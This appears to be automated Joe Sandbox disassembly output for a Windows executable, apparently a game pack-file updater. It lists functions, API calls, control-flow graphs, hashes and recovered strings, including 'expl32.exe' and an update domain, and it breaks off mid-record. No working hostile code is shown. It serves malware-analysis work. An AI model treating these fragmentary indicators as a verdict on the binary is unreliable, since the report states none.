                                                                              control_flow_graph 1079 409080-4090e2 CreateFontIndirectA 1080 409340-409346 1079->1080 1081 4090e8 1079->1081 1082 409171 1080->1082 1083 40934c-409356 1080->1083 1084 409235-409260 1081->1084 1085 4090ee-4090f1 1081->1085 1086 409178-40919a NtdllDefWindowProc_A 1082->1086 1083->1082 1087 40935c-4093b4 EndDialog 1083->1087 1094 409262-409269 1084->1094 1095 40926b-409271 1084->1095 1088 4090f7-4090fa 1085->1088 1089 40919d-4091a3 1085->1089 1087->1086 1088->1082 1092 4090fc-40911c 73A1A570 SetBkMode 1088->1092 1089->1082 1090 4091a5-4091af 1089->1090 1093 4091b4-4091e8 1090->1093 1096 409169-40916a 1092->1096 1097 40911e-409163 GetObjectA SelectObject 73A24D40 DeleteDC 1092->1097 1099 4091ea-4091ee 1093->1099 1100 4091ef-409220 CreateWindowExA 1093->1100 1098 409272-4092ea SelectObject 73A24D40 DeleteDC 73A1A570 SetBkMode GetObjectA SelectObject SetTextColor SetTextAlign 1094->1098 1095->1098 1096->1082 1097->1096 1102 409307-40931e 1098->1102 1103 4092ec-409305 1098->1103 1099->1100 1100->1093 1104 409222-409230 1100->1104 1105 409320-40933b TextOutA 1102->1105 1103->1105 1104->1086 1105->1086
                                                                              APIs
                                                                              • CreateFontIndirectA.GDI32 ref: 004090D0
                                                                              • 73A1A570.USER32(?), ref: 00409104
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040910F
                                                                              • GetObjectA.GDI32(00000000,00000018,0042BF78), ref: 00409126
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0040913D
                                                                              • 73A24D40.GDI32(00000000,00000000,00000000,00000175,000000FA,00000000,00000020,00000028,00CC0020), ref: 0040915C
                                                                              • DeleteDC.GDI32(00000000), ref: 00409163
                                                                              • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0040918A
                                                                              • CreateWindowExA.USER32(00000000,button,0042C278,5000000B,?,?,000000B8,00000016,?,00000BB8,?,00000000), ref: 0040920A
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00409273
                                                                              • 73A24D40.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0040929C
                                                                              • DeleteDC.GDI32(00000000), ref: 004092A3
                                                                              • 73A1A570.USER32(?), ref: 004092AD
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 004092B8
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 004092C6
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004092CE
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 004092D7
                                                                              • SetTextAlign.GDI32(00000000,00000006), ref: 004092E0
                                                                              • TextOutA.GDI32(00000000,0000005D,00000003,?), ref: 00409323
                                                                              • EndDialog.USER32(?,?), ref: 004093A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Object$SelectText$A570CreateDeleteModeWindow$AlignColorDialogFontIndirectNtdllProc_
                                                                              • String ID: button
                                                                              • API String ID: 1251463983-973515837
                                                                              • Opcode ID: 079597768ebf10388918e9ac7c8da415abaeab1a726659306fdd9953dd61cf31
                                                                              • Instruction ID: 97f3adc7cd7aff7bc1a271ce3c2985495306b846210f8b0d7321a992ebd2d1f8
                                                                              • Opcode Fuzzy Hash: 079597768ebf10388918e9ac7c8da415abaeab1a726659306fdd9953dd61cf31
                                                                              • Instruction Fuzzy Hash: 0A91EA75304305AFD320CB64DC48FAB7BA9EB89311F008629FA15A72D1CBB4AD45CB69
                                                                              Function 00407D50 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 308filesleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000402,00000000,00000000), ref: 00407D73
                                                                              • FindFirstFileA.KERNEL32(00423624,?), ref: 00407EF5
                                                                              • realloc.MSVCRT ref: 00407F28
                                                                              • FindNextFileA.KERNEL32(00000000,00000010), ref: 00407F88
                                                                              • FindClose.KERNEL32(00000000), ref: 00407F97
                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040805F
                                                                              • DeleteFileA.KERNEL32(?), ref: 0040806A
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00408087
                                                                              • free.MSVCRT ref: 00408090
                                                                              • Sleep.KERNEL32(000001F4), ref: 0040809E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find$??3@AttributesCloseDeleteFirstMessageNextSendSleepfreerealloc
                                                                              • String ID: .$$$$.idx$.pak
                                                                              • API String ID: 3059534480-1417876688
                                                                              • Opcode ID: 9fff7417213362c5411c01a0d5264272eed1b6062a0d8486662a987e6cc153f5
                                                                              • Instruction ID: 5a013326e3552b0e42e49a698d267bbef56f4e4546462a7d611e60320ade1583
                                                                              • Opcode Fuzzy Hash: 9fff7417213362c5411c01a0d5264272eed1b6062a0d8486662a987e6cc153f5
                                                                              • Instruction Fuzzy Hash: 4F91C432B045044BC728D938A85156F76D2FBC4370F59473EB96B973C0DFB89D098299
                                                                              Function 0040A4E0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 127windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _strcmpi$MessageVersionsprintf
                                                                              • String ID: .exe$Notice$UDP$Warning$expl32.exe$usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 3312229095-3245884135
                                                                              • Opcode ID: 9bacac1aa02a6501fae6f23081cdde6fe2aa78fd54b0307e4d3bfa66c2d10a81
                                                                              • Instruction ID: 7108c0134235b0d24c7974922313b1a45e4bbdfc123481e3740c2cbd825b6a9b
                                                                              • Opcode Fuzzy Hash: 9bacac1aa02a6501fae6f23081cdde6fe2aa78fd54b0307e4d3bfa66c2d10a81
                                                                              • Instruction Fuzzy Hash: 2741E571244300ABD714DB60EC41FEB73A4EB44709F08493AF944E62C1E7B9E959CBAB
                                                                              Function 0040E790 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • fprintf.MSVCRT ref: 0040E8E6
                                                                                • Part of subcall function 0040F070: fprintf.MSVCRT ref: 0040F090
                                                                                • Part of subcall function 0040ED10: _errno.MSVCRT ref: 0040ED1B
                                                                                • Part of subcall function 0040ED10: _read.MSVCRT ref: 0040ED47
                                                                                • Part of subcall function 0040ED10: _read.MSVCRT ref: 0040ED81
                                                                              • fprintf.MSVCRT ref: 0040EB6F
                                                                              • fprintf.MSVCRT ref: 0040EBBA
                                                                              Strings
                                                                              • invalid compressed data--length error, xrefs: 0040EAEA
                                                                              • invalid compressed data--crc error, xrefs: 0040EAD5
                                                                              • len %ld, siz %ld, xrefs: 0040E8E0
                                                                              • out of memory, xrefs: 0040E840
                                                                              • internal error, invalid method, xrefs: 0040E955
                                                                              • invalid compressed data--format violated, xrefs: 0040E852
                                                                              • invalid compressed data--length mismatch, xrefs: 0040E8EC
                                                                              • %s: %s has more than one entry -- unchanged, xrefs: 0040EBB4
                                                                              • %s: %s has more than one entry--rest ignored, xrefs: 0040EB69
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf$_read$_errno
                                                                              • String ID: %s: %s has more than one entry -- unchanged$%s: %s has more than one entry--rest ignored$internal error, invalid method$invalid compressed data--crc error$invalid compressed data--format violated$invalid compressed data--length error$invalid compressed data--length mismatch$len %ld, siz %ld$out of memory
                                                                              • API String ID: 2012623344-3220522523
                                                                              • Opcode ID: 46af8c2c4373098f2a9bc839d858992bbc34b0fdb0185fa1fe0c0c9ddf4604c2
                                                                              • Instruction ID: 60c62ac95dc047ac150cbd7fd388a3c216baec0873c987c0950f82a66b40e376
                                                                              • Opcode Fuzzy Hash: 46af8c2c4373098f2a9bc839d858992bbc34b0fdb0185fa1fe0c0c9ddf4604c2
                                                                              • Instruction Fuzzy Hash: C0B156B3E042424BE714DF29EC8166A77E1EB81305F09893FD456E3392D6789819CBAD
                                                                              Function 0040DCA0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 402COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • fprintf.MSVCRT ref: 0040DD22
                                                                              • fprintf.MSVCRT ref: 0040DD82
                                                                              • _read.MSVCRT ref: 0040DE54
                                                                                • Part of subcall function 0040EE70: _write.MSVCRT ref: 0040EE83
                                                                                • Part of subcall function 0040EE70: _write.MSVCRT ref: 0040EEA3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _writefprintf$_read
                                                                              • String ID: %s: %s: compressed with %d bits, can only handle %d bits$%s: %s: warning, unknown flags 0x%x$corrupt input.$corrupt input. Use zcat to recover some data.
                                                                              • API String ID: 4113033460-489315195
                                                                              • Opcode ID: 2c270c05960ad287de41c3cdda716c17bbe9cd230a70337c50c0add8dffc0378
                                                                              • Instruction ID: 3b57f833bc613edc37e60aaf0f7d13840ec562a0a89938886b7465e2446b7979
                                                                              • Opcode Fuzzy Hash: 2c270c05960ad287de41c3cdda716c17bbe9cd230a70337c50c0add8dffc0378
                                                                              • Instruction Fuzzy Hash: BBE190B1A083458FD314CF69E88076A7BE1EB98304F04493EF986D7392D379D919CB99
                                                                              Function 0040D8B0 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Bad table
                                                                              • API String ID: 0-3047020491
                                                                              • Opcode ID: 95fc75dc60bc767d077f3f66d9364e0127cd733c9df23657a3df3dcb0e268cce
                                                                              • Instruction ID: d48034462d8855386d5c35e8060866e6f79aac56075eea6e3544f990265ef6ef
                                                                              • Opcode Fuzzy Hash: 95fc75dc60bc767d077f3f66d9364e0127cd733c9df23657a3df3dcb0e268cce
                                                                              • Instruction Fuzzy Hash: 8651F731A087118BD718AF68C45026FB3E2EFD8700F25493DD995A77A0E676D849CB8A
                                                                              Function 00405AF0 Relevance: .3, Instructions: 314COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _read$_errno
                                                                              • String ID:
                                                                              • API String ID: 2630594027-0
                                                                              • Opcode ID: 4c9ad85b3923edc0dbc8e8398af3cb2e2ea08ed3002972ea0bd427a6df888256
                                                                              • Instruction ID: 887640ac395f1a5db8850504ce1c43d8fcace77e014b7401d231caf187241dbf
                                                                              • Opcode Fuzzy Hash: 4c9ad85b3923edc0dbc8e8398af3cb2e2ea08ed3002972ea0bd427a6df888256
                                                                              • Instruction Fuzzy Hash: 58B1E1716087424BD708EF28E89422FB7E1FB84700F144E7ED496E7392E774A9558BC9
                                                                              Function 0040F203 Relevance: .2, Instructions: 203COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8c830666ce3dbc7f646bc1f83c3c6b4dd443af3cad4ee82aeea01b6ba1d353a9
                                                                              • Instruction ID: 515a171eabb2e377bae0157e7ea1b0293aed4d94f90945b710cf89dd4bd5b173
                                                                              • Opcode Fuzzy Hash: 8c830666ce3dbc7f646bc1f83c3c6b4dd443af3cad4ee82aeea01b6ba1d353a9
                                                                              • Instruction Fuzzy Hash: B681A77451D2818EE314DB39F98162E3BD19B69345B040CBED542ABBA3C7348A19C7AE
                                                                              Function 0040D2A0 Relevance: .1, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5307d1bd2f576f8720775d330983b66a8220b41fd9e36badaed59fce44080fdb
                                                                              • Instruction ID: d28bc8b52e312b286ffa472db19ca552de15cd7a648893b82bd3dfdf947a4cac
                                                                              • Opcode Fuzzy Hash: 5307d1bd2f576f8720775d330983b66a8220b41fd9e36badaed59fce44080fdb
                                                                              • Instruction Fuzzy Hash: CF312A65A082429BC714DF79AC506AB77D9AF89304F08843DFC89D7341E634D80EC7AA
                                                                              Function 00407290 Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 183filewindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateFileA.KERNEL32(0042374C,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004072B8
                                                                              • MessageBoxA.USER32(00000000,Can't open pack file.,0041BA48,00000000), ref: 004072CD
                                                                              • SetFileAttributesA.KERNEL32(0042BD64,00000080), ref: 004072E7
                                                                              • CreateFileA.KERNEL32(0042BD64,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00407301
                                                                              • MessageBoxA.USER32(00000000,Can't create temporary file.,0041BA48,00000000), ref: 0040731A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407321
                                                                              Strings
                                                                              • Can't open pack file., xrefs: 004072C7
                                                                              • Can't create the buffer., xrefs: 00407454
                                                                              • Seek error on pack file., xrefs: 00407468
                                                                              • Can't read from the pack file., xrefs: 00407474
                                                                              • Can't write to the temporary file., xrefs: 00407482
                                                                              • Can't create temporary file., xrefs: 00407314
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateMessage$AttributesCloseHandle
                                                                              • String ID: Can't create temporary file.$Can't create the buffer.$Can't open pack file.$Can't read from the pack file.$Can't write to the temporary file.$Seek error on pack file.
                                                                              • API String ID: 1554990673-618158162
                                                                              • Opcode ID: 2c2549749d5ed15ff31d72a332b69c00f4376567fac94e010c4ee392cd26b15c
                                                                              • Instruction ID: 088cd2c8b316aafd37c47dcd1b3932d69884186d12cb0bb1d7e292a7bbf51f2a
                                                                              • Opcode Fuzzy Hash: 2c2549749d5ed15ff31d72a332b69c00f4376567fac94e010c4ee392cd26b15c
                                                                              • Instruction Fuzzy Hash: 9951B631B84310BBD220AF65BC49F9B7F64EBC4B11F54442AF645A21D1C7BCA48587AE
                                                                              Function 004075E0 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 364windowfileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 750 4075e0-40760c 751 407624-40764e malloc 750->751 752 40760e-407621 call 402110 750->752 753 407650-40765b 751->753 754 40765c-4076ac SetFileAttributesA CreateFileA 751->754 752->751 756 4076c7-4076d8 754->756 757 4076ae-4076c2 MessageBoxA 754->757 760 407972-40799c CloseHandle qsort 756->760 761 4076de-4076fa 756->761 759 407a40-407a5c free 757->759 763 407a31-407a3c call 4074d0 760->763 764 4079a2-4079a8 760->764 762 4076fe-4077a1 _ftol SendMessageA call 4071d0 761->762 771 4077a3-4077ae 762->771 772 4077c7-4077c9 762->772 763->759 764->763 767 4079ae-4079fa SetDlgItemTextA ??2@YAPAXI@Z call 407290 764->767 775 407a08-407a15 767->775 776 4079fc-407a06 767->776 771->772 774 4077b0-4077b6 771->774 777 4077d4-4077f3 bsearch 772->777 778 4077cb-4077cf 772->778 774->772 779 4077b8-4077c3 774->779 780 407a16-407a2f call 4074d0 ??3@YAXPAX@Z 775->780 776->780 782 407844-40786f SetFilePointer 777->782 783 4077f5-4077fe 777->783 781 4078d7-4078f0 778->781 779->772 780->759 781->762 789 4078f6 781->789 786 407875-40787e 782->786 787 407937-40795f MessageBoxA CloseHandle ??3@YAXPAX@Z 782->787 784 407800-407810 SetFilePointer 783->784 785 407812-407821 SetFilePointer 783->785 790 407829-40782c 784->790 785->790 791 407882-40788f 786->791 787->759 789->760 793 407832-407842 790->793 794 40790e-407915 790->794 795 407891-407893 791->795 796 4078f8-4078fa 791->796 793->791 799 40791a-407932 MessageBoxA CloseHandle ??3@YAXPAX@Z 794->799 798 4078fc-40790c 795->798 800 407895-4078a0 call 401be0 795->800 797 4078a3-4078af 796->797 796->798 801 4078b0-4078c1 WriteFile 797->801 798->801 799->759 800->797 804 407964-407970 801->804 805 4078c7-4078d4 ??3@YAXPAX@Z 801->805 804->799 805->781
                                                                              APIs
                                                                              • malloc.MSVCRT ref: 0040763F
                                                                              • SetFileAttributesA.KERNEL32(0042374C,00000080), ref: 00407687
                                                                              • CreateFileA.KERNEL32(0042374C,40000000,00000000,00000000,00000003,00000080,00000000), ref: 004076A1
                                                                              • MessageBoxA.USER32(00000000,Can't load the previous pack file.,0041BA48,00000000), ref: 004076BC
                                                                              • _ftol.MSVCRT ref: 0040770E
                                                                              • SendMessageA.USER32(00000000,00000402,00000000,00000000), ref: 0040771F
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407973
                                                                              • qsort.MSVCRT ref: 0040798A
                                                                              • free.MSVCRT ref: 00407A45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FileMessage$AttributesCloseCreateHandleSend_ftolfreemallocqsort
                                                                              • String ID: Can't load the previous pack file.$Error writing pack file.$Optimizing text files. Please wait.$Seek error on pack file.
                                                                              • API String ID: 805181380-136849683
                                                                              • Opcode ID: 0bf95afa618e33443f51a1b03c5f87176b80dbd7bfd56cb2b879352834a9e38d
                                                                              • Instruction ID: c08a7ff05d14fec1e8503a5d2842de521340d74c7310671da368bf9f39cc22bb
                                                                              • Opcode Fuzzy Hash: 0bf95afa618e33443f51a1b03c5f87176b80dbd7bfd56cb2b879352834a9e38d
                                                                              • Instruction Fuzzy Hash: 7FC1C071A08300ABD310DF24DC45F6B7BE4ABC8704F14492EF94AA73D0D678E944CB5A
                                                                              Function 00403810 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 393COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 806 403810-403821 807 403826-40382c 806->807 808 403848-40384a 807->808 809 40382e-403830 807->809 812 40384d-40384f 808->812 810 403832-40383a 809->810 811 403844-403846 809->811 810->808 813 40383c-403842 810->813 811->812 814 403851-403866 call 403500 812->814 815 403867-403877 call 403ef0 812->815 813->807 813->811 820 403d35-403d39 815->820 821 40387d-40388b 815->821 822 40388d-403893 821->822 823 4038cf-4038d3 821->823 826 403895-4038ae 822->826 827 4038b8-4038be 822->827 824 4038d5-4038db 823->824 825 4038f9-403909 823->825 824->827 829 4038dd-4038f7 824->829 830 40390b-40390d 825->830 831 40395c-403974 825->831 832 4038af-4038b5 fprintf 826->832 827->820 828 4038c4-4038ce 827->828 829->832 830->831 833 40390f-403915 830->833 834 403982-403988 831->834 835 403976-403978 831->835 832->827 833->831 836 403917-40391d 833->836 838 40398e-403990 834->838 835->834 837 40397a-403980 835->837 836->827 839 40391f-403957 fprintf 836->839 837->838 840 403992-403994 838->840 841 4039c4-4039cb call 404200 838->841 839->827 840->841 842 403996-40399c 840->842 841->820 846 4039d1-4039d7 841->846 842->841 844 40399e-4039c2 842->844 844->846 847 4039e5 846->847 848 4039d9-4039df 846->848 850 4039ea-403a06 _open 847->850 848->847 849 4039e1-4039e3 848->849 849->850 851 403a40-403a52 call 40ecf0 850->851 852 403a08-403a3f fprintf perror 850->852 855 403a80 851->855 856 403a54-403a6a call 404400 851->856 857 403a85-403a8b 855->857 856->857 862 403a6c-403a7f _close 856->862 860 403a8d-403aae call 404bb0 _close 857->860 861 403aaf-403abc 857->861 864 403ad7-403ade call 403d40 861->864 865 403abe-403ad5 _fileno 861->865 864->820 874 403ae4-403aea 864->874 867 403b29-403b2f 865->867 869 403b31-403b3e 867->869 870 403b43-403b49 867->870 869->870 872 403b4b-403b5d 870->872 873 403b9e-403bb6 870->873 875 403b66-403b7d 872->875 876 403b5f-403b64 872->876 882 403bb8-403bbe 873->882 883 403c0f 873->883 874->867 877 403aec-403af2 874->877 878 403b84-403b9b fprintf 875->878 879 403b7f 875->879 876->878 877->869 881 403af4-403afa 877->881 878->873 879->878 881->867 884 403afc-403b02 881->884 886 403c19-403c32 _close 882->886 887 403bc0-403bc6 882->887 883->886 884->867 885 403b04-403b26 fprintf 884->885 885->867 888 403c34-403c41 _close 886->888 889 403c48-403c4f 886->889 887->886 890 403bc8-403bd5 887->890 888->889 891 403c43 call 40f100 888->891 892 403c70-403c76 889->892 893 403c51-403c57 889->893 890->886 894 403bd7-403bed call 404400 890->894 891->889 898 403d20-403d26 892->898 899 403c7c-403c82 892->899 893->820 897 403c5d-403c6f _unlink 893->897 894->886 907 403bef-403c0d 894->907 898->820 901 403d28-403d32 call 4053d0 898->901 902 403c84-403c98 fprintf 899->902 903 403c9a-403ca7 899->903 901->820 904 403ce4-403cea 902->904 905 403cc1-403cd6 903->905 906 403ca9-403cbf 903->906 910 403cec-403cf2 904->910 911 403d0d-403d1d fprintf 904->911 909 403cd7-403ce1 call 40f130 905->909 906->909 907->882 907->883 909->904 910->911 915 403cf4-403d0a fprintf 910->915 911->898 915->911
                                                                              APIs
                                                                              • fprintf.MSVCRT ref: 004038AF
                                                                              • fprintf.MSVCRT ref: 0040394E
                                                                              • _open.MSVCRT ref: 004039F5
                                                                              • fprintf.MSVCRT ref: 00403A1D
                                                                              • perror.MSVCRT ref: 00403A28
                                                                              • _close.MSVCRT ref: 00403A72
                                                                              • _close.MSVCRT ref: 00403AA1
                                                                              • _fileno.MSVCRT ref: 00403AC7
                                                                              • fprintf.MSVCRT ref: 00403B99
                                                                              • _close.MSVCRT ref: 00403C26
                                                                              • _close.MSVCRT ref: 00403C3A
                                                                              • _unlink.MSVCRT(0044F8A0), ref: 00403C62
                                                                                • Part of subcall function 00404BB0: printf.MSVCRT ref: 00404BE6
                                                                                • Part of subcall function 00404BB0: printf.MSVCRT ref: 00404BFD
                                                                                • Part of subcall function 00404BB0: _lseek.MSVCRT ref: 00404C3D
                                                                                • Part of subcall function 00404BB0: _read.MSVCRT ref: 00404C62
                                                                                • Part of subcall function 00404BB0: ctime.MSVCRT(0044F880,759A3440,?,759A38A0,004036FF,?,00000008), ref: 00404CEA
                                                                                • Part of subcall function 00404BB0: printf.MSVCRT ref: 00404D1F
                                                                              Strings
                                                                              Memory Dump Source
